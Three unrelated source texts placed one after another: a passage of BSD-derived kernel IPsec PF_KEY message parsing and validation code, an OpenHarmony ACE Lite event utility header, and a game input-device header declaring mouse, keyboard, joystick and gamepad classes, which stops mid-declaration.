0, m->m_pkthdr.len, mtod(n, caddr_t)); n->m_pkthdr.len = n->m_len = m->m_pkthdr.len; m_freem(m); m = n; } /* align the mbuf chain so that extensions are in contiguous region. */ error = key_align(m, &mh); if (error) return error; msg = mh.msg; /* check SA type */ switch (msg->sadb_msg_satype) { case SADB_SATYPE_UNSPEC: switch (msg->sadb_msg_type) { case SADB_GETSPI: case SADB_UPDATE: case SADB_ADD: case SADB_DELETE: case SADB_GET: case SADB_ACQUIRE: case SADB_EXPIRE: ipseclog((LOG_DEBUG, "key_parse: must specify satype " "when msg type=%u.\n", msg->sadb_msg_type)); pfkeystat.out_invsatype++; error = EINVAL; goto senderror; } break; case SADB_SATYPE_AH: case SADB_SATYPE_ESP: case SADB_X_SATYPE_IPCOMP: switch (msg->sadb_msg_type) { case SADB_X_SPDADD: case SADB_X_SPDDELETE: case SADB_X_SPDGET: case SADB_X_SPDDUMP: case SADB_X_SPDFLUSH: case SADB_X_SPDSETIDX: case SADB_X_SPDUPDATE: case SADB_X_SPDDELETE2: ipseclog((LOG_DEBUG, "key_parse: illegal satype=%u\n", msg->sadb_msg_type)); pfkeystat.out_invsatype++; error = EINVAL; goto senderror; } break; case SADB_SATYPE_RSVP: case SADB_SATYPE_OSPFV2: case SADB_SATYPE_RIPV2: case SADB_SATYPE_MIP: ipseclog((LOG_DEBUG, "key_parse: type %u isn't supported.\n", msg->sadb_msg_satype)); pfkeystat.out_invsatype++; error = EOPNOTSUPP; goto senderror; case 1: /* XXX: What does it do? */ if (msg->sadb_msg_type == SADB_X_PROMISC) break; /*FALLTHROUGH*/ default: ipseclog((LOG_DEBUG, "key_parse: invalid type %u is passed.\n", msg->sadb_msg_satype)); pfkeystat.out_invsatype++; error = EINVAL; goto senderror; } /* check field of upper layer protocol and address family */ if (mh.ext[SADB_EXT_ADDRESS_SRC] != NULL && mh.ext[SADB_EXT_ADDRESS_DST] != NULL) { struct sadb_address *src0, *dst0; u_int plen; src0 = (struct sadb_address *)(mh.ext[SADB_EXT_ADDRESS_SRC]); dst0 = (struct sadb_address *)(mh.ext[SADB_EXT_ADDRESS_DST]); /* check upper layer protocol */ if (src0->sadb_address_proto != dst0->sadb_address_proto) { ipseclog((LOG_DEBUG, "key_parse: upper layer protocol mismatched.\n")); pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } /* check family */ if (PFKEY_ADDR_SADDR(src0)->sa_family != PFKEY_ADDR_SADDR(dst0)->sa_family) { ipseclog((LOG_DEBUG, "key_parse: address family mismatched.\n")); pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } if (PFKEY_ADDR_SADDR(src0)->sa_len != PFKEY_ADDR_SADDR(dst0)->sa_len) { ipseclog((LOG_DEBUG, "key_parse: address struct size mismatched.\n")); pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } switch (PFKEY_ADDR_SADDR(src0)->sa_family) { case AF_INET: if (PFKEY_ADDR_SADDR(src0)->sa_len != sizeof(struct sockaddr_in)) { pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } break; case AF_INET6: if (PFKEY_ADDR_SADDR(src0)->sa_len != sizeof(struct sockaddr_in6)) { pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } break; default: ipseclog((LOG_DEBUG, "key_parse: unsupported address family.\n")); pfkeystat.out_invaddr++; error = EAFNOSUPPORT; goto senderror; } switch (PFKEY_ADDR_SADDR(src0)->sa_family) { case AF_INET: plen = sizeof(struct in_addr) << 3; break; case AF_INET6: plen = sizeof(struct in6_addr) << 3; break; default: plen = 0; /*fool gcc*/ break; } /* check max prefix length */ if (src0->sadb_address_prefixlen > plen || dst0->sadb_address_prefixlen > plen) { ipseclog((LOG_DEBUG, "key_parse: illegal prefixlen.\n")); pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } /* * prefixlen == 0 is valid because there can be a case when * all addresses are matched. */ } if (msg->sadb_msg_type >= NELEM(key_typesw) || key_typesw[msg->sadb_msg_type] == NULL) { pfkeystat.out_invmsgtype++; error = EINVAL; goto senderror; } return (*key_typesw[msg->sadb_msg_type])(so, m, &mh); senderror: msg->sadb_msg_errno = error; return key_sendup_mbuf(so, m, target); } static int key_senderror(struct socket *so, struct mbuf *m, int code) { struct sadb_msg *msg; if (m->m_len < sizeof(struct sadb_msg)) panic("invalid mbuf passed to key_senderror"); msg = mtod(m, struct sadb_msg *); msg->sadb_msg_errno = code; return key_sendup_mbuf(so, m, KEY_SENDUP_ONE); } /* * set the pointer to each header into message buffer. * m will be freed on error. * XXX larger-than-MCLBYTES extension? */ static int key_align(struct mbuf *m, struct sadb_msghdr *mhp) { struct mbuf *n; struct sadb_ext *ext; size_t off, end; int extlen; int toff; /* sanity check */ if (m == NULL || mhp == NULL) panic("key_align: NULL pointer is passed.\n"); if (m->m_len < sizeof(struct sadb_msg)) panic("invalid mbuf passed to key_align"); /* initialize */ bzero(mhp, sizeof(*mhp)); mhp->msg = mtod(m, struct sadb_msg *); mhp->ext[0] = (struct sadb_ext *)mhp->msg; /*XXX backward compat */ end = PFKEY_UNUNIT64(mhp->msg->sadb_msg_len); extlen = end; /*just in case extlen is not updated*/ for (off = sizeof(struct sadb_msg); off < end; off += extlen) { n = m_pulldown(m, off, sizeof(struct sadb_ext), &toff); if (!n) { /* m is already freed */ return ENOBUFS; } ext = (struct sadb_ext *)(mtod(n, caddr_t) + toff); /* set pointer */ switch (ext->sadb_ext_type) { case SADB_EXT_SA: case SADB_EXT_ADDRESS_SRC: case SADB_EXT_ADDRESS_DST: case SADB_EXT_ADDRESS_PROXY: case SADB_EXT_LIFETIME_CURRENT: case SADB_EXT_LIFETIME_HARD: case SADB_EXT_LIFETIME_SOFT: case SADB_EXT_KEY_AUTH: case SADB_EXT_KEY_ENCRYPT: case SADB_EXT_IDENTITY_SRC: case SADB_EXT_IDENTITY_DST: case SADB_EXT_SENSITIVITY: case SADB_EXT_PROPOSAL: case SADB_EXT_SUPPORTED_AUTH: case SADB_EXT_SUPPORTED_ENCRYPT: case SADB_EXT_SPIRANGE: case SADB_X_EXT_POLICY: case SADB_X_EXT_SA2: /* duplicate check */ /* * XXX Are there duplication payloads of either * KEY_AUTH or KEY_ENCRYPT ? */ if (mhp->ext[ext->sadb_ext_type] != NULL) { ipseclog((LOG_DEBUG, "key_align: duplicate ext_type %u " "is passed.\n", ext->sadb_ext_type)); m_freem(m); pfkeystat.out_dupext++; return EINVAL; } break; default: ipseclog((LOG_DEBUG, "key_align: invalid ext_type %u is passed.\n", ext->sadb_ext_type)); m_freem(m); pfkeystat.out_invexttype++; return EINVAL; } extlen = PFKEY_UNUNIT64(ext->sadb_ext_len); if (key_validate_ext(ext, extlen)) { m_freem(m); pfkeystat.out_invlen++; return EINVAL; } n = m_pulldown(m, off, extlen, &toff); if (!n) { /* m is already freed */ return ENOBUFS; } ext = (struct sadb_ext *)(mtod(n, caddr_t) + toff); mhp->ext[ext->sadb_ext_type] = ext; mhp->extoff[ext->sadb_ext_type] = off; mhp->extlen[ext->sadb_ext_type] = extlen; } if (off != end) { m_freem(m); pfkeystat.out_invlen++; return EINVAL; } return 0; } static int key_validate_ext(const struct sadb_ext *ext, int len) { const struct sockaddr *sa; enum { NONE, ADDR } checktype = NONE; int baselen = 0; const int sal = offsetof(struct sockaddr, sa_len) + sizeof(sa->sa_len); if (len != PFKEY_UNUNIT64(ext->sadb_ext_len)) return EINVAL; /* if it does not match minimum/maximum length, bail */ if (ext->sadb_ext_type >= NELEM(minsize) || ext->sadb_ext_type >= NELEM(maxsize)) return EINVAL; if (!minsize[ext->sadb_ext_type] || len < minsize[ext->sadb_ext_type]) return EINVAL; if (maxsize[ext->sadb_ext_type] && len > maxsize[ext->sadb_ext_type]) return EINVAL; /* more checks based on sadb_ext_type XXX need more */ switch (ext->sadb_ext_type) { case SADB_EXT_ADDRESS_SRC: case SADB_EXT_ADDRESS_DST: case SADB_EXT_ADDRESS_PROXY: baselen = PFKEY_ALIGN8(sizeof(struct sadb_address)); checktype = ADDR; break; case SADB_EXT_IDENTITY_SRC: case SADB_EXT_IDENTITY_DST: if (((const struct sadb_ident *)ext)->sadb_ident_type == SADB_X_IDENTTYPE_ADDR) { baselen = PFKEY_ALIGN8(sizeof(struct sadb_ident)); checktype = ADDR; } else checktype = NONE; break; default: checktype = NONE; break; } switch (checktype) { case NONE: break; case ADDR: sa = (const struct sockaddr *)(((const u_int8_t*)ext)+baselen); if (len < baselen + sal) return EINVAL; if (baselen + PFKEY_ALIGN8(sa->sa_len) != len) return EINVAL; break; } return 0; } void key_init(void) { int i; for (i = 0; i < IPSEC_DIR_MAX; i++) { LIST_INIT(&sptree[i]); } LIST_INIT(&sahtree); for (i = 0; i <= SADB_SATYPE_MAX; i++) { LIST_INIT(&regtree[i]); } #ifndef IPSEC_NONBLOCK_ACQUIRE LIST_INIT(&acqtree); #endif LIST_INIT(&spacqtree); /* system default */ ip4_def_policy.policy = IPSEC_POLICY_NONE; ip4_def_policy.refcnt++; /*never reclaim this*/ #ifndef IPSEC_DEBUG2 callout_init(&key_timehandler_ch); callout_reset(&key_timehandler_ch, hz, key_timehandler, NULL); #endif /*IPSEC_DEBUG2*/ /* initialize key statistics */ keystat.getspi_count = 1; kprintf("IPsec: Initialized Security Association Processing.\n"); return; } /* * XXX: maybe This function is called after INBOUND IPsec processing. * * Special check for tunnel-mode packets. * We must make some checks for consistency between inner and outer IP header. * * xxx more checks to be provided */ int key_checktunnelsanity(struct secasvar *sav, u_int family, caddr_t src, caddr_t dst) { /* sanity check */ if (sav->sah == NULL) panic("sav->sah == NULL at key_checktunnelsanity"); /* XXX: check inner IP header */ return 1; } #if 0 #define hostnamelen strlen(hostname) /* * Get FQDN for the host. * If the administrator configured hostname (by hostname(1)) without * domain name, returns nothing. */ static const char * key_getfqdn(void) { int i; int hasdot; static char fqdn[MAXHOSTNAMELEN + 1]; if (!hostnamelen) return NULL; /* check if it comes with domain name. */ hasdot = 0; for (i = 0; i < hostnamelen; i++) { if (hostname[i] == '.') hasdot++; } if (!hasdot) return NULL; /* NOTE: hostname may not be NUL-terminated. */ bzero(fqdn, sizeof(fqdn)); bcopy(hostname, fqdn, hostnamelen); fqdn[hostnamelen] = '\0'; return fqdn; } /* * get username@FQDN for the host/user. */ static const char * key_getuserfqdn(void) { const char *host; static char userfqdn[MAXHOSTNAMELEN + MAXLOGNAME + 2]; struct proc *p = curproc; char *q; if (!p || !p->p_pgrp || !p->p_pgrp->pg_session) return NULL; if (!(host = key_getfqdn())) return NULL; /* NOTE: s_login may not be-NUL terminated. */ bzero(userfqdn, sizeof(userfqdn)); bcopy(p->p_pgrp->pg_session->s_login, userfqdn, MAXLOGNAME); userfqdn[MAXLOGNAME] = '\0'; /* safeguard */ q = userfqdn + strlen(userfqdn); *q++ = '@'; bcopy(host, q, strlen(host)); q += strlen(host); *q++ = '\0'; return userfqdn; } #endif /* record data transfer on SA, and update timestamps */ void key_sa_recordxfer(struct secasvar *sav, struct mbuf *m) { KASSERT(sav != NULL, ("key_sa_recordxfer: Null secasvar")); KASSERT(m != NULL, ("key_sa_recordxfer: Null mbuf")); if (!sav->lft_c) return; /* * XXX Currently, there is a difference of bytes size * between inbound and outbound processing. */ sav->lft_c->sadb_lifetime_bytes += m->m_pkthdr.len; /* to check bytes lifetime is done in key_timehandler(). */ /* * We use the number of packets as the unit of * sadb_lifetime_allocations. We increment the variable * whenever {esp,ah}_{in,out}put is called. */ sav->lft_c->sadb_lifetime_allocations++; /* XXX check for expires? */ /* * NOTE: We record CURRENT sadb_lifetime_usetime by using wall clock, * in seconds. HARD and SOFT lifetime are measured by the time * difference (again in seconds) from sadb_lifetime_usetime. * * usetime * v expire expire * -----+-----+--------+---> t * <--------------> HARD * <-----> SOFT */ sav->lft_c->sadb_lifetime_usetime = time_second; /* XXX check for expires? */ return; } /* dumb version */ void key_sa_routechange(struct sockaddr *dst) { struct secashead *sah; struct route *ro; LIST_FOREACH(sah, &sahtree, chain) { ro = &sah->sa_route; if (ro->ro_rt && dst->sa_len == ro->ro_dst.sa_len && bcmp(dst, &ro->ro_dst, dst->sa_len) == 0) { RTFREE(ro->ro_rt); ro->ro_rt = NULL; } } return; } static void key_sa_chgstate(struct secasvar *sav, u_int8_t state) { if (sav == NULL) panic("key_sa_chgstate called with sav == NULL"); if (sav->state == state) return; if (__LIST_CHAINED(sav)) LIST_REMOVE(sav, chain); sav->state = state; LIST_INSERT_HEAD(&sav->sah->savtree[state], sav, chain); } void key_sa_stir_iv(struct secasvar *sav) { if (!sav->iv) panic("key_sa_stir_iv called with sav == NULL"); key_randomfill(sav->iv, sav->ivlen); } /* XXX too much? */ static struct mbuf * key_alloc_mbuf(int l) { struct mbuf *m = NULL, *n; int len, t; len = l; while (len > 0) { n = m_getb(len, MB_DONTWAIT, MT_DATA, 0); if (!n) { m_freem(m); return NULL; } n->m_len = 0; n->m_len = M_TRAILINGSPACE(n); /* use the bottom of mbuf, hoping we can prepend afterwards */ if (n->m_len > len) { t = (n->m_len - len) & ~(sizeof(long) - 1); n->m_data += t; n->m_len = len; } len -= n->m_len; if (m) m_cat(m, n); else m = n; } return m; }
/* * Copyright (c) 2021 Huawei Device Co., Ltd. * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #ifndef OHOS_ACELITE_EVENT_UTIL_H #define OHOS_ACELITE_EVENT_UTIL_H #include "non_copyable.h" #include "ui_view.h" #include "wrapper/js.h" namespace OHOS { namespace ACELite { struct CallbackParams : public MemoryHeap { JSValue vm; JSValue fn; JSValue arg; }; class EventUtil final : public MemoryHeap { public: ACE_DISALLOW_COPY_AND_MOVE(EventUtil); /** * @brief Create a JAVASCRIPT plain object that is used as the input parameter of * the callback function for click or longpress event. */ static JSValue CreateEvent(const char *type, UIView &view, const Event &event); /** * @brief Create a JAVASCRIPT plain object that is used as the input parameter of * the callback function for swipe event. */ static JSValue CreateSwipeEvent(UIView &view, const DragEvent &event); /** * @brief Invoke the callback function of event. */ static void InvokeCallback(JSValue vm, JSValue callback, JSValue event, const void *context = nullptr); static const char *EVENT_CLICK; static const char *EVENT_LONGPRESS; static const char *EVENT_SWIPE; private: EventUtil() {} ~EventUtil() {} /** * @brief Get the DOM element that is reference to view */ static JSValue GetElementByUIView(UIView *view); }; } // namespace ACELite } // namespace OHOS #endif // OHOS_ACELITE_EVENT_UTIL_H
#pragma once // mode variable for each HID (human input device) // keyboard: [MODE1]: OS events (default) [MODE2]: manual update() NA in linux [MODE3]: directinput [MODE4]: windows raw data(NA) // mouse: [MODE1]: OS events (default) [MODE2]: manual update() using different funcs [MODE3]: direct input (win) // joystick: j[0-7]: sys driver j[8-15]: directinput / NA / NA j[16-19]: xinput/ NA / NA // gamepad: gp[0-7]: sys driver gp[8-15]: directinput / NA / NA gp[16-19]: xinput/ NA / NA // gamewheel:gw[0-7]: sys driver gw[8-15]: directinput / NA / NA gw[16-19]: xinput/ NA / NA // [internal workings]: joysticks/ gamepads/ gamewheels share direct input & xinput drivers & os drivers // in keyboard [MODE 2&3] keystats when pressed have eiter 129 or 128 value test with key[]& 0x80 (it might be good to make this to all modes) // in keyboard [MODE 1] windows doesnt send keyup if both rshift and lshift are pressed (same with alt and control), NOT RELIABLE FOR those keys // in keyboard [MODE 2] update is made when a key is pressed, based in a windows message. it could be changed, just comment in the processMSG() the lines to update the keyboard&update manually // in keyboard [MODE 3] update must be done manually in a loop (with update()) // *more USAGE stuff* // 1. should check joysticks/gamepads/gamewheels mode. if it's 0, there is no HID present - activating it does nothing // 2. every joystick/gamepad/gamewheel must be activated first to signal osiInput::update() to update it's values // simply call j/gp/gw[n].activate() // GAMEPAD BUTTON PRESSUREs 20 - 23 are for dPad button pressures // TODO is on the cpp file #define MAX_KEYBOARD_KEYS 256 #define MAX_MOUSE_BUTTONS 16 #define MAX_JOYSTICK_BUTTONS 32 #define MAX_KEYS_LOGGED 16 #define MAX_JOYSTICKS 20 /// nr of maximum joysticks/gamepads/gamewheels, NOT JUST JOYSTICKS // --------------============= MOUSE CLASS ============-------------- ///================================================================== class osiMouse { public: // USAGE / settings int8_t mode; // [MODE 1]: OS events(default) - works on every OS // [MODE 2]: manual update() using different funcs (can't make it work under linux/mac, but still researching ways...) // [MODE 3]: win(direct input) / linux(n/a) / mac(n/a) // position int x, y; // current mouse position //int vx, vy; // current mouse position on the virtual desktop *TO BE OR NOT TO BE: x&y would be inside window coords... things might get messier, tho int oldx, oldy; // old mouse position (can be useful) since last in.update() call int dx, dy; // mouse delta movement values, since last in.update() call // wheel // WHEELS CAN HAVE EXACT AXIS VALUES... <<< look into this some more int wheel; // wheel delta rotation in units since last in.update() call // buttons struct osiMouseButton { uint64_t lastDT; // last button press delta time in milisecs uint64_t lastTimeStart; // last button press start time uint64_t lastTimeEnded; // last button press end time bool down; // button is currently pressed uint64_t timeStart; // time @ button down start osiMouseButton(): lastDT(0), lastTimeStart(0), lastTimeEnded(0), down(false), timeStart(0) {}; } but[MAX_MOUSE_BUTTONS]; // funcs bool init(int8_t mode); // can init mouse with this function (usually is best to call in.init(..) instead of this) void update(); // if not using mode 1, update mouse values with this bool activate(); // activates the mouse after an alt-tab or on app start bool unactivate(); // called if any init needs to be done when the application loses focus bool grab(); // set the mouse can only move in the window boundaries bool ungrab(); // set the mouse to roam the plains free void setPos(int, int); // sets the mouse position void resetButtons(); // resets all buttons in case of alt-tab or something similar // constructors / destructors osiMouse(); ~osiMouse(); void delData(); int _twheel; // to be changed to the new mac processMSG <<<<<<<<<<<<<<<<<<<<<<<<<<<<<< (to private) private: bool _bActive, _bGrabbed; friend bool _processMSG(void); friend class osiInput; friend class osinteraction; #ifdef OS_WIN //friend LRESULT CALLBACK _processMSG(HWND, UINT, WPARAM, LPARAM); #ifdef USING_DIRECTINPUT void *_diDevice; struct { long lX, lY, lZ; unsigned char rgbButtons[8]; } _diStats; #endif /// USING DIRECT INPUT #endif /// OS_WIN }; // --------------============= KEYBOARD CLASS ============-------------- ///===================================================================== class osiKeyboard { public: int8_t mode; // [MODE1]: OS events (default) [MODE2]: manual update() [MODE3]: directinput [MODE4]: windows raw data /// use Input::Kv structure if you need to find a certain key. EX: in.k.key[Kv.enter] is the enter key status (pressed or not pressed) uint8_t *key; // all keys button status - it points to buffer1/buffer2. there is a clever swap between the two buffers, so there is no copying involved uint64_t keyTime[MAX_KEYBOARD_KEYS]; // time @ key started to be pressed uint8_t *lastCheck; // holds what the last time the keys were checked button press info - points to 1 of the buffers bool capsLock, scrollLock, numLock; // the 3 toggle locks <<< there are other 'locks'... on foreign keyboards bool insertLock; // insert is basically working like any 'lock' key struct osiKeyLog { int32_t code; // scan code of the keyboard key (Input::Kv structure has all the keyboard key codes for each OS) bool checked; // checked & lastKey[] used for mortal kombat style of keyboard check uint64_t timeDown; // exact time when key was pressed uint64_t timeUp; // exact time when key was de-pressed - can be 0, indicating key is still pressed uint64_t timeDT; // how long the key was pressed (timeUp-timeDown) - can be 0, indicating key is still pressed osiKeyLog(const osiKeyLog &o): code(o.code), checked(o.checked), timeDown(o.timeDown), timeUp(o.timeUp), timeDT(o.timeDT) {}; osiKeyLog(): code(0), checked(false), timeDown(0), timeUp(0), timeDT(0) {} }lastKey[MAX_KEYS_LOGGED]; // history of keys pressed - using this history, it is possible to make a Mortal Kombat combo check - like game (it has every needed variable & time for each key press&release) // character input/ character manipulation keys (enter/arrows/del/etc) class chTyped:public segData { // uses the segment chainlist class(segList.cpp/h), check constructor in Keyboard() public: uint32_t c; // character typed (unicode); call getChar() to get the first character typed (it removes it from the list too) uint64_t time; // time when the character was typed }; /// in charTyped.nrNodes / manipTyped.nrNodes is the nr of chars waiting to be processed (they get auto-del after 1-2 secs if not processed) segList charTyped; // list with chars typed. charTyped::nrNodes has nr of chars waiting to be 'read'. dimensions: [size:32, unitsize sizeof(chTyped)]; //segList manipTyped; // [MOVED INSIDE charTyped - NO NEED FOR 2 LISTS] list with string manip chars (arrow keys, backspace, del, enter, etc) /// the main functions to call to get a char / string manip char uint32_t getChar(); // returns a character typed @ keyboard or null if nothing is typed. (call it until it returns 0, or for each charTyped.nrNodes) //uint32_t getManip(); // [MOVED TO getChar() - NO NEED FOR 2 LISTS !!!] returns a str manip key press. (call it until it returns 0, or for each manipTyped.nrNodes) void clearTypedBuffer(); // clears all character buffers, ususally called when switching to a new/ existing input box / control // funcs void update(); // just call in.update(); MAIN LOOP FUNC: updates keys pressed array (key[] / lastCheck[]) (maybe toggle the locks? - N/A ATM) void resetButtons(); // call after losing program focus / need to reset all keys / fixes history of pressed keys too (lastkey[]) bool activate(); // if any init is needed on alt-tab or program start, this func does it (in.init() activates everything) / on some systems this does nothing bool unactivate(); // called after app lose focus / on some systems this does nothing bool grab(); // DANGER!! grabs exclusive control of the keyboard, if program halts or keyboard is not handled corectly, the whole system can lose the keyboard. AVOID! bool ungrab(); // ungrab the keyboard - better to just avoid grabbing void updateLocks(); // updates all the locks (caps, num, scroll) - autocalled by system event handler, but can be called when manually updating keyboard // <<< ON SOME KEYBOARDS THIS MUST BE UPDATED TO HANDLE SPECIAL LOCK KEYS >>> // --- NOTHING TO BOTHER from this point on (usually) --- bool init(int8_t mode= 1); // see 'mode' var; can be used to initialize direct input, otherwize, use Input::init() void _log(const osiKeyLog &); // [internal] just puts the last key in the last key-history (it logs imediatly when a key is down) void _addChar(uint32_t c, uint64_t *time); // [internal] used in WM_CHAR message... nothing to bother //void _addManip(uint32_t c, uint64_t *time); // REMOVED - ONLY ONE LIST [internal] string manipulation keys - enter/del/arrow keys/etc void _checkAndAddUnicode(uint32_t in_char); // [internal] OSchar.cpp. checks if current unicode and keys pressed form a char manip, if they do, it adds it into charTyped void _checkKeyManip(uint32_t in_keyCode); // [internal] OSchar.cpp. checks if current keys pressed form a char manip, if they do, it adds it in charTyped void removeOldChars(uint64_t in_howOld= 1000); // [in_howOld: milisecs] remove chars that were not used from [charTyped] inline void swapBuffers(); // swaps what key and lastKey point to (so no copying is involved) osiKeyboard(); ~osiKeyboard(); void delData(); /// standard dealloc func / called by destroyer private: bool _bActive, _bGrabbed; friend class osiInput; uint8_t _buffer1[MAX_KEYBOARD_KEYS], _buffer2[MAX_KEYBOARD_KEYS]; /// used for the key / lastCheck. buffers are swapped with pointers, so no copying is involved #ifdef OS_WIN #ifdef USING_DIRECTINPUT void *_diDevice; #endif /// USING_DIRECTINPUT #endif /// OS_WIN // TESTING int16_t getFirstKey(); void printPressed(); // to be or not to be - THIS REALLY SEEMS USELESS (31.01.2014) maybe if extending to ps4/xbone... // uint repeat[256]; /// how many times a character was repeated // inline int getRepeat(int key) { uint t= repeat[key]; repeat[key]= 0; return t; } // these might be useless ^^^ // /TESTING }; struct osiButLog { uint8_t but; /// button number bool checked; /// this is just a helper flag that can be messed with; always starts on false when a new key is added (osi doesn't use it for anything) uint64_t timeDown, timeUp, timeDT; /// timeDown: when button was pressed; timeUp: when button was released (0= button is STILL pressed); timeDT: how much time was pressed (time delta) osiButLog(const osiButLog &o): but(o.but), checked(o.checked), timeDown(o.timeDown), timeUp(o.timeUp), timeDT(o.timeDT) {}; osiButLog():but(0), checked(false), timeDown(0), timeUp(0), timeDT(0) {} }; #ifdef OS_MAC #include <mutex> #endif class osiGamePad; class osiGameWheel; // --------------============= JOYSTICK CLASS ============-------------- ///===================================================================== class osiJoystick { public: // CONFIGURATION int8_t mode; // [MODE0]: disabled, can check (and should) against this // [MODE1]: OS native // [MODE2]: win(directinput) / linux(n/a) / mac(n/a) // [MODE3]: win(xinput) / linux(n/a) / mac(n/a) str8 name; // joystick name (product name) int16_t maxButtons; // nr of buttons the gameWheel has // AXIS int32_t x, y; // [-32767 0 +32767] main stick x and y axis int32_t x2, y2; // [-32767 0 +32767] second stick x and y axis (these are reserved as i don't think these are used atm) int32_t throttle; // [-32767 0 +32767] 3rd axis usually throttle int32_t rudder; // [-32767 0 +32767] 4th axis usually rudder int32_t u, v; // [-32767 0 +32767] fifth/ sixth axis (reserved, i guess, they might be used by some sticks tho) int32_t pov; // [-1null 0 +35999] POV angle (atm it's in degrees multiplied by 100 so it's range is from 0 to 35900) // BUTTONS state / history / everything uint8_t *but; // buttons state uint8_t *butPrev; // holds the previous button state int32_t butPressure[MAX_JOYSTICK_BUTTONS]; // [0 +65534] button pressure (how hard a button is pressed) buttons 20-23 are pressure on the pov uint64_t butTime[MAX_JOYSTICK_BUTTONS]; // time @ key started to be pressed osiButLog butLog[MAX_KEYS_LOGGED]; // history of pressed/depressed buttons // FUNCTIONS bool activate(); // !! activates stick, signaling to update internal values & grabs exclusive control of stick bool deactivate(); // deactivates & ungrabs exclusive control of stick bool isActive() { return _bActive; } bool grab(); // exclusive control of the device (if possible) bool ungrab(); // lose exclusive control of the device void resetButtons(); // clears all button buffers & resets logged buttons (used in case of alt-tab or something similar) void resetAxis(); // clears all stick axis values void update(); // MAIN UPDATE FUNC (for every type of stick/pad/wheel) (calling Input::update() calls this too, if stick is active) osiJoystick(); ~osiJoystick(); void delData(); // private data from here on private: friend class osiInput; friend class osinteraction; bool _bActive, _bGrabbed; // internal flags osiGamePad *_gp; // linked gamepad - each stick has a coresponding gamepad that uses the same 'driver' osiGameWheel *_gw; // linked gamewheel - each stick has a coresponding gamewheel that uses the same 'driver' uint8_t _buffer1[MAX_JOYSTICK_BUTTONS], _buffer2[MAX_JOYSTICK_BUTTONS]; /// used for the but / butPrev. buffers are swapped with pointers, so no copying is involved inline void _swapBuffers(); // [internal] swaps button buffers void _log(const osiButLog &); // [internal] just puts the last button in the last button-history (it logs imediatly when a button is down) /// OS specific stuff #ifdef OS_WIN int16_t _id; // windows id (THIS MIGHT BE UNIVERSAL) #ifdef USING_DIRECTINPUT // primary friend BOOL CALLBACK _diDevCallback(void *, void *); void *_diDevice; //LPCDIDEVICEINSTANCE diID; // ID of the device; if a new one is plugged, it will differ from current IDs struct _GUID { uint32_t Data1; uint16_t Data2, Data3; uint8_t Data4[8]; } _diID; // ID of the device; if a new one is plugged, it will differ from current IDs struct _DIJOYSTATE2 { int32_t lX, lY, lZ; // x,y,z-axis position int32_t lRx, lRy, lRz; // x,y,z-axis rotation int32_t rglSlider[2]; // extra axes positions uint32_t rgdwPOV[4]; // POV directions uint8_t rgbButtons[128]; // 128 buttons int32_t lVX, lVY, lVZ; // x,y,z-axis velocity int32_t lVRx, lVRy, lVRz; // x,y,z-axis angular velocity int32_t rglVSlider[2]; // extra axes velocities int32_t lAX, lAY, lAZ; // x,y,z-axis acceleration int32_t lARx, lARy, lARz; // x,y,z-axis angular acceleration int32_t rglASlider[2]; // extra axes accelerations int32_t lFX, lFY, lFZ; // x-axis force int32_t lFRx, lFRy, lFRz; // x-axis torque int32_t rglFSlider[2]; // extra axes forces } _diStats; #endif /// USING_DIRECTINPUT #ifdef USING_XINPUT // secondary, probly main joysticks are using direct input #endif /// USING_XINPUT #endif /// OS_WIN #ifdef OS_LINUX int32_t _jsFile; // opened /dev/input/jsNNN file int16_t _jsID; // /dev/input/jsNNN NNN= id int32_t _eventFile; // opened /dev/input/eventNNN eventFile int16_t _eventID; // /dev/input/eventNNN NNN= eventID #endif #ifdef OS_MAC //friend void _HIDchange(void *, IOReturn, void *, IOHIDValueRef); public: /// this struct is used to transfer data from HID callback funcs (that can write at any moment anythinhg - dangerous) struct _CallbackTame { int32_t x, y, x2, y2, throttle, rudder, u, v, pov; uint8_t but[MAX_JOYSTICK_BUTTONS]; int32_t butPressure[MAX_JOYSTICK_BUTTONS]; std::mutex mutex; /// object lock system _CallbackTame() { delData(); } void delData() { x= y= x2= y2= throttle= rudder= u= v= 0; pov= -1; for(int a= 0; a< MAX_JOYSTICK_BUTTONS; a++) butPressure[a]= but[a]= 0; } } _cbTame; private: #endif }; // --------------============= GAMEPAD CLASS ============-------------- ///==================================================================== class osiGamePad { friend class osiInput; friend class osiJoystick; public: // CONFIGURATION int8_t mode; // [MODE0]: disabled, can check against this // [MODE1]: OS native // [MODE2]: win(directinput) / linux(n/a) / mac(n/a) // [MODE3]: win(xinput) / linux(n/a) / mac(n/a) str8 name; // gamepad name (product name) int16_t type; // 0= ps3 compatible; 1= xbox compatible - COULD BE CHANGED by user in-game, and it will work to update the right axis!!! int16_t maxButtons; // nr of buttons the gamePad has // AXIS int32_t lx, ly; // [-32767 0 +32767] stick 1 axis position (left) int32_t rx, ry; // [-32767 0 +32767] stick 2 axis position (right) int32_t lt, rt; // [0 +65534] left and right triggers int32_t u, v; // [-32767 0 +32767] extra axis - updated but usually not used... usually... can't know what pad they make int32_t pov; // [-1null 0 +35900] POV angle (multiplied by 100, so 35,900(max)= 359 degrees) (-1 usually, if not pressed) // BUTTONS state / history uint8_t *but; // buttons state uint8_t *butPrev; // holds previous buttons state int32_t butPressure[MAX_JOYSTICK_BUTTONS]; // [0 +65534] button pressure (how hard a button is pressed) buttons 20-23 are pressure on the pov uint64_t butTime[MAX_JOYSTICK_BUTTONS]; // time @ key started to be pressed osiButLog butLog[MAX_KEYS_LOGGED]; // history of pressed/depressed buttons // functions bool activate() { return _j->activate(); } // !! activates pad, signaling to update it's data values& grabbing exclusive usage bool deactivate() { return _j->deactivate(); } // deactivates & ungrabs device void resetButtons(); // clears all button buffers & resets logged buttons (used in case of alt-tab or something similar) void resetAxis(); // resets all gamepad axis to 0 / null position void update() { _j->update(); } // can be called, to manually update the gamepad variables bool grab() { return _j->grab(); } // exclusive control of the device (if possible) bool ungrab() { return _j->ungrab(); }// 